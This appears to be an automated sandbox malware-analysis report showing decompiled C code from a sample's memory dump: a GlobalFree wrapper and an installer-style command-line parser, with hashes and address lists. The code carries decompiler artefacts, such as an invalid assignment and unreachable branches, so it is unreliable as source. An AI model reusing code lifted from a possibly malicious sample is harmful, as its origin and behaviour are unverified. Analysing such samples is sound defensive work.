                                                                                                                                                                                                                                                • Instruction ID: b2ec98124c7ca023bcd8908504b16c9d46b3bf3390fdd05d8bca199a594103ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05ee9cdf5216ee9352b41dc3e9404c031c78feae1ec3d7569a71be86cc67eddd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABB0123314420CF7CF101EC3E809F853F5DE7C8B61F150000F60C4A0408A7795108795
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E4CC0(void* _a4) {
                                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                0x010e4cc8
                                                                                                                                                                                                                                                0x010e4ccf

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2979337801-0
                                                                                                                                                                                                                                                • Opcode ID: 098f025b5c914edee307f7b163346ec93f764747e64aef05dec8a93621d5d681
                                                                                                                                                                                                                                                • Instruction ID: 89846b3abdaae744b0e51e7ab2470597cf8d385939833bc7a2d7408c655d6ef5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 098f025b5c914edee307f7b163346ec93f764747e64aef05dec8a93621d5d681
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EB0123100010CF78F101A43E8088453F5DD6C47707000010F50C460118B3B98118684
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E010E5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                				CHAR* _v265;
                                                                                                                                                                                                                                                				char _v266;
                                                                                                                                                                                                                                                				char _v267;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				CHAR* _v272;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				signed int _v296;
                                                                                                                                                                                                                                                				char _v556;
                                                                                                                                                                                                                                                				signed int _t61;
                                                                                                                                                                                                                                                				int _t63;
                                                                                                                                                                                                                                                				char _t67;
                                                                                                                                                                                                                                                				CHAR* _t69;
                                                                                                                                                                                                                                                				signed int _t71;
                                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                                				char _t79;
                                                                                                                                                                                                                                                				void* _t83;
                                                                                                                                                                                                                                                				void* _t85;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				intOrPtr _t88;
                                                                                                                                                                                                                                                				void* _t100;
                                                                                                                                                                                                                                                				intOrPtr _t101;
                                                                                                                                                                                                                                                				CHAR* _t104;
                                                                                                                                                                                                                                                				intOrPtr _t105;
                                                                                                                                                                                                                                                				void* _t111;
                                                                                                                                                                                                                                                				void* _t115;
                                                                                                                                                                                                                                                				CHAR* _t118;
                                                                                                                                                                                                                                                				void* _t119;
                                                                                                                                                                                                                                                				void* _t127;
                                                                                                                                                                                                                                                				CHAR* _t129;
                                                                                                                                                                                                                                                				void* _t132;
                                                                                                                                                                                                                                                				void* _t142;
                                                                                                                                                                                                                                                				signed int _t143;
                                                                                                                                                                                                                                                				CHAR* _t144;
                                                                                                                                                                                                                                                				void* _t145;
                                                                                                                                                                                                                                                				void* _t146;
                                                                                                                                                                                                                                                				void* _t147;
                                                                                                                                                                                                                                                				void* _t149;
                                                                                                                                                                                                                                                				char _t155;
                                                                                                                                                                                                                                                				void* _t157;
                                                                                                                                                                                                                                                				void* _t162;
                                                                                                                                                                                                                                                				void* _t163;
                                                                                                                                                                                                                                                				char _t167;
                                                                                                                                                                                                                                                				char _t170;
                                                                                                                                                                                                                                                				CHAR* _t173;
                                                                                                                                                                                                                                                				void* _t177;
                                                                                                                                                                                                                                                				intOrPtr* _t183;
                                                                                                                                                                                                                                                				intOrPtr* _t192;
                                                                                                                                                                                                                                                				CHAR* _t199;
                                                                                                                                                                                                                                                				void* _t200;
                                                                                                                                                                                                                                                				CHAR* _t201;
                                                                                                                                                                                                                                                				void* _t205;
                                                                                                                                                                                                                                                				void* _t206;
                                                                                                                                                                                                                                                				int _t209;
                                                                                                                                                                                                                                                				void* _t210;
                                                                                                                                                                                                                                                				void* _t212;
                                                                                                                                                                                                                                                				void* _t213;
                                                                                                                                                                                                                                                				CHAR* _t218;
                                                                                                                                                                                                                                                				intOrPtr* _t219;
                                                                                                                                                                                                                                                				intOrPtr* _t220;
                                                                                                                                                                                                                                                				signed int _t221;
                                                                                                                                                                                                                                                				signed int _t223;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t173 = __ecx;
                                                                                                                                                                                                                                                				_t61 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                                				_push(__ebx);
                                                                                                                                                                                                                                                				_push(__esi);
                                                                                                                                                                                                                                                				_push(__edi);
                                                                                                                                                                                                                                                				_t209 = 1;
                                                                                                                                                                                                                                                				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                                					_t63 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                					while(_t209 != 0) {
                                                                                                                                                                                                                                                						_t67 =  *_t173;
                                                                                                                                                                                                                                                						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                                							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_v272 = _t173;
                                                                                                                                                                                                                                                						if(_t67 == 0) {
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t69 = _v272;
                                                                                                                                                                                                                                                							_t177 = 0;
                                                                                                                                                                                                                                                							_t213 = 0;
                                                                                                                                                                                                                                                							_t163 = 0;
                                                                                                                                                                                                                                                							_t202 = 1;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								if(_t213 != 0) {
                                                                                                                                                                                                                                                									if(_t163 != 0) {
                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										goto L21;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t69 =  *_t69;
                                                                                                                                                                                                                                                									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t69 = _v272;
                                                                                                                                                                                                                                                										L21:
                                                                                                                                                                                                                                                										_t155 =  *_t69;
                                                                                                                                                                                                                                                										if(_t155 != 0x22) {
                                                                                                                                                                                                                                                											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                                												goto L106;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                                												_t177 = _t177 + 1;
                                                                                                                                                                                                                                                												_t202 = _t202 + 1;
                                                                                                                                                                                                                                                												_t157 = 1;
                                                                                                                                                                                                                                                												goto L30;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                                												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                                													L106:
                                                                                                                                                                                                                                                													_t63 = 0;
                                                                                                                                                                                                                                                													L125:
                                                                                                                                                                                                                                                													_pop(_t210);
                                                                                                                                                                                                                                                													_pop(_t212);
                                                                                                                                                                                                                                                													_pop(_t162);
                                                                                                                                                                                                                                                													return E010E6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                                													_t177 = _t177 + 1;
                                                                                                                                                                                                                                                													_t202 = _t202 + 1;
                                                                                                                                                                                                                                                													_t157 = 2;
                                                                                                                                                                                                                                                													goto L30;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t157 = 1;
                                                                                                                                                                                                                                                												if(_t213 != 0) {
                                                                                                                                                                                                                                                													_t163 = 1;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t213 = 1;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L30;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L131;
                                                                                                                                                                                                                                                								L30:
                                                                                                                                                                                                                                                								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                                								_t69 = _v272;
                                                                                                                                                                                                                                                							} while ( *_t69 != 0);
                                                                                                                                                                                                                                                							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                                								E010E6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                                								asm("int3");
                                                                                                                                                                                                                                                								_push(_t221);
                                                                                                                                                                                                                                                								_t222 = _t223;
                                                                                                                                                                                                                                                								_t71 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                                								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                                									0x4f0 = 2;
                                                                                                                                                                                                                                                									_t75 = E010E597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E010E44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                                									 *0x10e9124 = E010E6285();
                                                                                                                                                                                                                                                									_t75 = 0;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								return E010E6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                                								if(_t213 == 0) {
                                                                                                                                                                                                                                                									if(_t163 != 0) {
                                                                                                                                                                                                                                                										goto L34;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										goto L40;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									if(_t163 != 0) {
                                                                                                                                                                                                                                                										L40:
                                                                                                                                                                                                                                                										_t79 = _v268;
                                                                                                                                                                                                                                                										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                                											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                                											if(_t83 == 0) {
                                                                                                                                                                                                                                                												_t202 = 0x521;
                                                                                                                                                                                                                                                												E010E44B9(0, 0x521, 0x10e1140, 0, 0x40, 0);
                                                                                                                                                                                                                                                												_t85 =  *0x10e8588; // 0x0
                                                                                                                                                                                                                                                												if(_t85 != 0) {
                                                                                                                                                                                                                                                													CloseHandle(_t85);
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												ExitProcess(0);
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t87 = _t83 - 4;
                                                                                                                                                                                                                                                											if(_t87 == 0) {
                                                                                                                                                                                                                                                												if(_v266 != 0) {
                                                                                                                                                                                                                                                													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                														goto L49;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                                														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                                														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                                														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                                														_t202 = _t50;
                                                                                                                                                                                                                                                														do {
                                                                                                                                                                                                                                                															_t88 =  *_t183;
                                                                                                                                                                                                                                                															_t183 = _t183 + 1;
                                                                                                                                                                                                                                                														} while (_t88 != 0);
                                                                                                                                                                                                                                                														if(_t183 == _t202) {
                                                                                                                                                                                                                                                															goto L49;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t205 = 0x5b;
                                                                                                                                                                                                                                                															if(E010E667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                                																L115:
                                                                                                                                                                                                                                                																_t206 = 0x5d;
                                                                                                                                                                                                                                                																if(E010E667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                                																	L117:
                                                                                                                                                                                                                                                																	_t202 =  &_v276;
                                                                                                                                                                                                                                                																	_v276 = _t167;
                                                                                                                                                                                                                                                																	if(E010E5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                                																		goto L49;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		_t202 = 0x104;
                                                                                                                                                                                                                                                																		E010E1680(0x10e8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	_t202 = 0x5b;
                                                                                                                                                                                                                                                																	if(E010E667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                                																		goto L49;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		goto L117;
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																_t202 = 0x5d;
                                                                                                                                                                                                                                                																if(E010E667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                                																	goto L49;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	goto L115;
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													 *0x10e8a24 = 1;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L50;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t100 = _t87 - 1;
                                                                                                                                                                                                                                                												if(_t100 == 0) {
                                                                                                                                                                                                                                                													L98:
                                                                                                                                                                                                                                                													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                														goto L49;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                                														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                                														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                                														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                                														_t202 = _t38;
                                                                                                                                                                                                                                                														do {
                                                                                                                                                                                                                                                															_t101 =  *_t192;
                                                                                                                                                                                                                                                															_t192 = _t192 + 1;
                                                                                                                                                                                                                                                														} while (_t101 != 0);
                                                                                                                                                                                                                                                														if(_t192 == _t202) {
                                                                                                                                                                                                                                                															goto L49;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t202 =  &_v276;
                                                                                                                                                                                                                                                															_v276 = _t170;
                                                                                                                                                                                                                                                															if(E010E5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                                																goto L49;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                                																_t218 = 0x10e8b3e;
                                                                                                                                                                                                                                                																_t105 = _v276;
                                                                                                                                                                                                                                                																if(_t104 != 0x54) {
                                                                                                                                                                                                                                                																	_t218 = 0x10e8a3a;
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                																E010E1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                                																_t202 = 0x104;
                                                                                                                                                                                                                                                																E010E658A(_t218, 0x104, 0x10e1140);
                                                                                                                                                                                                                                                																if(E010E31E0(_t218) != 0) {
                                                                                                                                                                                                                                                																	goto L50;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	goto L106;
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                                													if(_t111 == 0) {
                                                                                                                                                                                                                                                														if(_v266 != 0) {
                                                                                                                                                                                                                                                															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                																goto L49;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																_t199 = _v265;
                                                                                                                                                                                                                                                																if(_t199 != 0) {
                                                                                                                                                                                                                                                																	_t219 =  &_v265;
                                                                                                                                                                                                                                                																	do {
                                                                                                                                                                                                                                                																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                                																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                                																		if(_t115 == 0) {
                                                                                                                                                                                                                                                																			 *0x10e8a2c = 1;
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			_t200 = 2;
                                                                                                                                                                                                                                                																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                                																			if(_t119 == 0) {
                                                                                                                                                                                                                                                																				 *0x10e8a30 = 1;
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                                																					 *0x10e8a34 = 1;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t209 = 0;
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																		_t118 =  *_t219;
                                                                                                                                                                                                                                                																		_t199 = _t118;
                                                                                                                                                                                                                                                																	} while (_t118 != 0);
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															 *0x10e8a2c = 1;
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                														goto L50;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														_t127 = _t111 - 3;
                                                                                                                                                                                                                                                														if(_t127 == 0) {
                                                                                                                                                                                                                                                															if(_v266 != 0) {
                                                                                                                                                                                                                                                																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                																	goto L49;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                                																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                                																		goto L76;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                                																			goto L83;
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                                																				goto L76;
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				goto L49;
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																L76:
                                                                                                                                                                                                                                                																_push(2);
                                                                                                                                                                                                                                                																_pop(1);
                                                                                                                                                                                                                                                																L83:
                                                                                                                                                                                                                                                																 *0x10e8a38 = 1;
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                															goto L50;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t132 = _t127 - 1;
                                                                                                                                                                                                                                                															if(_t132 == 0) {
                                                                                                                                                                                                                                                																if(_v266 != 0) {
                                                                                                                                                                                                                                                																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                																			goto L49;
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		_t201 = _v265;
                                                                                                                                                                                                                                                																		 *0x10e9a2c = 1;
                                                                                                                                                                                                                                                																		if(_t201 != 0) {
                                                                                                                                                                                                                                                																			_t220 =  &_v265;
                                                                                                                                                                                                                                                																			do {
                                                                                                                                                                                                                                                																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                                																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                                																				if(_t142 == 0) {
                                                                                                                                                                                                                                                																					_t143 = 2;
                                                                                                                                                                                                                                                																					 *0x10e9a2c =  *0x10e9a2c | _t143;
                                                                                                                                                                                                                                                																					goto L70;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                                																					if(_t145 == 0) {
                                                                                                                                                                                                                                                																						 *0x10e8d48 =  *0x10e8d48 | 0x00000040;
                                                                                                                                                                                                                                                																					} else {
                                                                                                                                                                                                                                                																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                                																						if(_t146 == 0) {
                                                                                                                                                                                                                                                																							 *0x10e9a2c =  *0x10e9a2c & 0xfffffffd;
                                                                                                                                                                                                                                                																							goto L70;
                                                                                                                                                                                                                                                																						} else {
                                                                                                                                                                                                                                                																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                                																							if(_t147 == 0) {
                                                                                                                                                                                                                                                																								 *0x10e9a2c =  *0x10e9a2c & 0xfffffffe;
                                                                                                                                                                                                                                                																								goto L70;
                                                                                                                                                                                                                                                																							} else {
                                                                                                                                                                                                                                                																								_t149 = _t147;
                                                                                                                                                                                                                                                																								if(_t149 == 0) {
                                                                                                                                                                                                                                                																									 *0x10e8d48 =  *0x10e8d48 | 0x00000080;
                                                                                                                                                                                                                                                																								} else {
                                                                                                                                                                                                                                                																									if(_t149 == 3) {
                                                                                                                                                                                                                                                																										 *0x10e9a2c =  *0x10e9a2c | 0x00000004;
                                                                                                                                                                                                                                                																										L70:
                                                                                                                                                                                                                                                																										 *0x10e8a28 = 1;
                                                                                                                                                                                                                                                																									} else {
                                                                                                                                                                                                                                                																										_t209 = 0;
                                                                                                                                                                                                                                                																									}
                                                                                                                                                                                                                                                																								}
                                                                                                                                                                                                                                                																							}
                                                                                                                                                                                                                                                																						}
                                                                                                                                                                                                                                                																					}
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																				_t144 =  *_t220;
                                                                                                                                                                                                                                                																				_t201 = _t144;
                                                                                                                                                                                                                                                																			} while (_t144 != 0);
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	 *0x10e9a2c = 3;
                                                                                                                                                                                                                                                																	 *0x10e8a28 = 1;
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                																goto L50;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																if(_t132 == 0) {
                                                                                                                                                                                                                                                																	goto L98;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	L49:
                                                                                                                                                                                                                                                																	_t209 = 0;
                                                                                                                                                                                                                                                																	L50:
                                                                                                                                                                                                                                                																	_t173 = _v272;
                                                                                                                                                                                                                                                																	if( *_t173 != 0) {
                                                                                                                                                                                                                                                																		goto L2;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		break;
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L106;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										L34:
                                                                                                                                                                                                                                                										_t209 = 0;
                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L131;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if( *0x10e8a2c != 0 &&  *0x10e8b3e == 0) {
                                                                                                                                                                                                                                                						if(GetModuleFileNameA( *0x10e9a3c, 0x10e8b3e, 0x104) == 0) {
                                                                                                                                                                                                                                                							_t209 = 0;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t202 = 0x5c;
                                                                                                                                                                                                                                                							 *((char*)(E010E66C8(0x10e8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t63 = _t209;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				L131:
                                                                                                                                                                                                                                                			}


































































                                                                                                                                                                                                                                                0x010e5d4b
                                                                                                                                                                                                                                                0x010e5d4b
                                                                                                                                                                                                                                                0x010e5d4f
                                                                                                                                                                                                                                                0x010e5d8d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d93
                                                                                                                                                                                                                                                0x010e5d93
                                                                                                                                                                                                                                                0x010e5d9a
                                                                                                                                                                                                                                                0x010e5d9d
                                                                                                                                                                                                                                                0x010e5d9e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d9e
                                                                                                                                                                                                                                                0x010e5d51
                                                                                                                                                                                                                                                0x010e5d5b
                                                                                                                                                                                                                                                0x010e5d72
                                                                                                                                                                                                                                                0x010e60fb
                                                                                                                                                                                                                                                0x010e60fb
                                                                                                                                                                                                                                                0x010e6207
                                                                                                                                                                                                                                                0x010e620a
                                                                                                                                                                                                                                                0x010e620b
                                                                                                                                                                                                                                                0x010e620e
                                                                                                                                                                                                                                                0x010e6217
                                                                                                                                                                                                                                                0x010e5d78
                                                                                                                                                                                                                                                0x010e5d78
                                                                                                                                                                                                                                                0x010e5d80
                                                                                                                                                                                                                                                0x010e5d83
                                                                                                                                                                                                                                                0x010e5d84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d84
                                                                                                                                                                                                                                                0x010e5d5d
                                                                                                                                                                                                                                                0x010e5d5f
                                                                                                                                                                                                                                                0x010e5d62
                                                                                                                                                                                                                                                0x010e5d68
                                                                                                                                                                                                                                                0x010e5d64
                                                                                                                                                                                                                                                0x010e5d64
                                                                                                                                                                                                                                                0x010e5d64
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d62
                                                                                                                                                                                                                                                0x010e5d5b
                                                                                                                                                                                                                                                0x010e5d4f
                                                                                                                                                                                                                                                0x010e5d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d9f
                                                                                                                                                                                                                                                0x010e5d9f
                                                                                                                                                                                                                                                0x010e5da5
                                                                                                                                                                                                                                                0x010e5dab
                                                                                                                                                                                                                                                0x010e5dba
                                                                                                                                                                                                                                                0x010e6218
                                                                                                                                                                                                                                                0x010e621d
                                                                                                                                                                                                                                                0x010e6220
                                                                                                                                                                                                                                                0x010e6221
                                                                                                                                                                                                                                                0x010e6229
                                                                                                                                                                                                                                                0x010e6230
                                                                                                                                                                                                                                                0x010e6247
                                                                                                                                                                                                                                                0x010e626a
                                                                                                                                                                                                                                                0x010e6272
                                                                                                                                                                                                                                                0x010e6249
                                                                                                                                                                                                                                                0x010e6255
                                                                                                                                                                                                                                                0x010e625f
                                                                                                                                                                                                                                                0x010e6264
                                                                                                                                                                                                                                                0x010e6264
                                                                                                                                                                                                                                                0x010e6284
                                                                                                                                                                                                                                                0x010e5dc0
                                                                                                                                                                                                                                                0x010e5dc0
                                                                                                                                                                                                                                                0x010e5dca
                                                                                                                                                                                                                                                0x010e5e22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5dcc
                                                                                                                                                                                                                                                0x010e5dce
